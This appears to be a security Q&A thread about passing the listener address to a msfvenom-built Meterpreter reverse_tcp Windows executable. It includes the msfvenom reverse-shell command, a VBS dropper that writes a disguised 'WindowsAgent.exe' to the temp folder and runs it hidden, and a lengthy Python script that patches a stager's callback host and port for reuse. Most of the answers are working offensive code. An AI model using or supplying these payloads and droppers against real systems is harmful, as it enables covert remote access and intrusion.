I'm using MSFvenom to export a Meterpreter reverse TCP payload. While this works with msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe, I would like to specify LHOST and LPORT dynamically.
Ideally I would pass the arguments straight to the executable, for example by running shell_meterpreter.exe -LHOST 192.168.6.100 -LPORT 1111 from a command prompt.
Does anyone know of a way to achieve this? I tried looking through the source code but didn't have much luck.
Posted on 2017-11-18 05:43:21
I managed to find a solution that works for me.
I located the LPORT and LHOST variables in a hex view of the executable (see screenshot).

For anyone who doesn't feel like testing this themselves, I wrote a small VBS script that hooks into the hex code.
Function BuildExe(Text)
    ' Convert the hex string to raw bytes using the MSXML "bin.hex" data type:
    ' assign the text first, then switch the type, then read the value back as a byte array.
    Set dom = CreateObject("Microsoft.XMLDOM")
    dom.loadXML("<TtB/>")
    dom.documentElement.nodeTypedValue = Text
    dom.documentElement.dataType = "bin.hex"
    exeBytes = dom.documentElement.nodeTypedValue
    ' Create a uniquely named folder under %TEMP% (special folder 2) and the path for the executable.
    Set fso = CreateObject("Scripting.FileSystemObject")
    exeDir = fso.GetSpecialFolder(2) & "\" & fso.GetTempName()
    fso.CreateFolder(exeDir)
    exePath = exeDir & "\" & "WindowsAgent.exe"
    ' Write the bytes to disk through a binary ADODB stream and save the executable.
    Set exeStream = CreateObject("ADODB.Stream")
    exeStream.Type = 1              ' adTypeBinary
    exeStream.Open
    exeStream.Write exeBytes
    exeStream.SaveToFile exePath, 2 ' adSaveCreateOverWrite
    exeStream.Close
    ' Return the executable filepath.
    BuildExe = exePath
End Function
' Initialize the script.
' Log is a logging helper from the author's own framework; it is not included in the post.
Log "PAYLOAD", "Payload shell_meterpreter.vbs has been launched."
' Load BuildExe from build_exe.vbs. Execute() runs a string of code rather than a file,
' so read the file's contents and hand them to ExecuteGlobal.
Set fso = CreateObject("Scripting.FileSystemObject")
ExecuteGlobal fso.OpenTextFile("lib\includes\build_exe.vbs", 1).ReadAll()
' Set the listener info in hex, matching how the stager stores it:
' the port as a 4-digit big-endian hex value ("115C" for 4444; padded so ports below
' 4096 still produce two bytes) and the IPv4 address as four 2-digit hex octets
' ("C0A80683" for 192.168.6.131).
LPORT = Right("000" & Hex(4444), 4)
octets = Split("192.168.6.131", ".")
For i = 0 To UBound(octets)
    octetHex = Hex(octets(i))
    If Len(octetHex) = 1 Then
        octetHex = "0" & octetHex
    End If
    If i = 0 Then
        LHOST = octetHex
    Else
        LHOST = LHOST & octetHex
    End If
Next
' Build and run Meterpreter.
' The argument to BuildExe is the hex dump of the executable with LHOST and LPORT
' spliced in at the offsets found in the hex view; the page omits it because the line was too long.
exePath = BuildExe(...)
WScript.CreateObject("WScript.Shell").Run "cmd.exe /C start /B cmd /C " & exePath, 0, True

Posted on 2017-11-17 06:58:44
msfvenom -p windows/x64/meterpreter/reverse_tcp **LHOST=192.168.x.x** LPORT=4444 -f -exe

Here you are using msfvenom to generate code that gets you a reverse shell on the target; once it has been generated, the attacking machine's IP is not passed to it, or, in your case, compiled into the executable, if that makes sense.
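The self-answer's approach (find the LHOST/LPORT bytes in the executable and overwrite them) and this answer's point that the listener address is baked in at build time can be shown concretely. The following is an added example written for this page, not code from any of the posters: it locates the sockaddr_in constant that Metasploit's Windows reverse_tcp stagers embed and rewrites it in place. The layouts are taken from the Metasploit stager sources as I know them and should be checked against a hex dump of your own build: the x64 stager loads the structure with `mov r12, imm64`, stored on disk as `02 00` (AF_INET), the port big-endian, then the four IP octets; the x86 stager does `push <ip>` followed by `push <AF_INET|port>`. The sample fragments are constructed, the script name `patch_listener.py` is mine, and the `--old` default is the question's own 192.168.6.131:4444. It goes slightly beyond the page by handling the x86 stager as well as the x64 one.

```python
#!/usr/bin/env python3
"""Rewrite the LHOST/LPORT constant embedded in an msfvenom reverse_tcp stager.

Added example for this page (not the original poster's VBS): the same
"find the listener in the hex and overwrite it" step, done in Python for
both the x64 and x86 Windows reverse_tcp stager layouts (assumed from the
Metasploit stager sources; verify against your own hex dump).
"""
import argparse
import socket
import struct


def listener_encodings(host: str, port: int) -> dict:
    """Byte sequences the Windows reverse_tcp stagers embed for the listener's
    sockaddr_in (family AF_INET=2, port big-endian, IP in network order).

    x64: mov r12, imm64   -> on disk (little-endian): 02 00 <port BE> <ip>
    x86: push <ip> ; push <family|port> -> 68 <ip> 68 02 00 <port BE>
    """
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    ip = socket.inet_aton(host)        # raises OSError on a malformed address
    port_be = struct.pack(">H", port)  # 4444 -> 11 5c, the "115C" the VBS computes with Hex("4444")
    return {
        "x64": b"\x02\x00" + port_be + ip,
        "x86": ip + b"\x68\x02\x00" + port_be,
    }


def patch_listener(blob: bytes, old: tuple, new: tuple) -> tuple:
    """Replace every embedded old (host, port) with new (host, port).

    Returns (patched_bytes, patch_count). Both encodings have the same length
    for any host:port, so the file size and all other offsets are unchanged.
    """
    needles = listener_encodings(*old)
    replacements = listener_encodings(*new)
    out = bytearray(blob)
    count = 0
    for arch, needle in needles.items():
        start = 0
        while (idx := out.find(needle, start)) != -1:
            out[idx:idx + len(needle)] = replacements[arch]
            count += 1
            start = idx + len(needle)
    return bytes(out), count


# Constructed sample input (not a real binary): a few bytes of x64 stager around
# the `mov r12, imm64` (49 bc ...) for 192.168.6.131:4444.
SAMPLE_X64_FRAGMENT = (
    b"\x48\x83\xec\x20"                                   # sub rsp, 0x20
    + b"\x49\xbc" + b"\x02\x00\x11\x5c\xc0\xa8\x06\x83"  # mov r12, 0x8306a8c05c110002
    + b"\x41\x54\x4c\x89\xe2"                             # push r12 ; mov rdx, r12
)

# Constructed x86 counterpart: push 10 ; push 0x8306a8c0 ; push 0x5c110002 ; mov esi, esp
SAMPLE_X86_FRAGMENT = (
    b"\x6a\x0a" + b"\x68\xc0\xa8\x06\x83" + b"\x68\x02\x00\x11\x5c" + b"\x89\xe6"
)


def main() -> None:
    ap = argparse.ArgumentParser(description="patch LHOST:LPORT in a reverse_tcp stager exe")
    ap.add_argument("infile")
    ap.add_argument("outfile")
    ap.add_argument("--old", default="192.168.6.131:4444", help="host:port the exe was built with")
    ap.add_argument("--new", required=True, help="host:port to connect back to instead")
    args = ap.parse_args()
    old_host, old_port = args.old.rsplit(":", 1)
    new_host, new_port = args.new.rsplit(":", 1)
    with open(args.infile, "rb") as f:
        blob = f.read()
    patched, n = patch_listener(blob, (old_host, int(old_port)), (new_host, int(new_port)))
    if n != 1:
        # 0: layout not found (encoded/encrypted payload, or the wrong --old value);
        # >1: an unrelated byte run also matched, so inspect the hex dump before trusting the output.
        raise SystemExit(f"expected exactly one listener block, patched {n}; refusing to write")
    with open(args.outfile, "wb") as f:
        f.write(patched)
    print(f"patched {n} listener block(s) -> {args.outfile}")


if __name__ == "__main__":
    main()
```

Usage: `python3 patch_listener.py shell_meterpreter.exe out.exe --new 192.168.6.100:1111`. The hex values the VBS computes (`115C` for the port, `C0A80683` for the address) are exactly the port and IP portions of these patterns. This only works on an unencoded stager; with an encoder (`-e`) or an encrypted payload the constant is not present in cleartext, which the "exactly one match" check catches. It also does not make LHOST runtime-dynamic as the question asks; it lets you re-target a generated exe per engagement without running msfvenom on the build host.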
Posted on 2022-11-16 17:30:54
I would write a simple bash script that lets me quickly add the host and port dynamically and generate the payload with msfvenom.
https://security.stackexchange.com/questions/173669